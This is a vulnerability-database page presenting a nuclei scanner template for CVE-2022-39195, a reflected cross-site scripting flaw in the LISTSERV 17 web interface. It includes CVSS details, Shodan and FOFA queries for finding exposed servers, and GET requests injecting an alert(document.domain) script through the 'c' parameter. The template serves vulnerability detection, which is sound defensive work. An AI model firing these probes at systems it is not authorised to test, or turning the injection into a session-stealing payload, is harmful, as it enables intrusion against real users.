Lucene search
K

LISTSERV 17 - Cross-Site Scripting

🗓️ 07 Jul 2026 03:01:27Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 89 Views

LISTSERV 17 Cross-Site Scripting vulnerability allows injection of arbitrary JavaScript/HTML leading to session hijacking or sensitive info thef

Related
Refs
Code
id: CVE-2022-39195

info:
  name: LISTSERV 17 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    LISTSERV 17 web interface contains a cross-site scripting vulnerability. An attacker can inject arbitrary JavaScript or HTML via the "c" parameter, thereby possibly allowing the attacker to steal cookie-based authentication credentials and launch other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - https://packetstormsecurity.com/files/170552/LISTSERV-17-Cross-Site-Scripting.html
    - https://peach.ease.lsoft.com/scripts/wa-PEACH.exe?A0=LSTSRV-L
    - https://packetstormsecurity.com/2301-exploits/listserv17-xss.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2022-39195
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-39195
    cwe-id: CWE-79
    epss-score: 0.06314
    epss-percentile: 0.92771
    cpe: cpe:2.3:a:lsoft:listserv:17.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: lsoft
    product: listserv
    shodan-query:
      - http.html:"LISTSERV"
      - http.html:"listserv"
    fofa-query: body="listserv"
  tags: cve,cve2022,xss,listserv,packetstorm,lsoft,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/scripts/wa.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"
      - "{{BaseURL}}/scripts/wa-HAP.exe?TICKET=test&c=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<script>alert(document.domain)</script>"
          - "LISTSERV"
        case-insensitive: true
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100fd60bdd97d8bdbe4ab985749baaab35280f11fd3503c5768cc66d9ad9a49d344022100caf164a7e2975df9aa02764c1882f700657f3197b4f317a0e63d9a78c4db5c19:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.4Medium risk
Vulners AI Score6.4
CVSS 3.16.1
EPSS0.06314
SSVC
89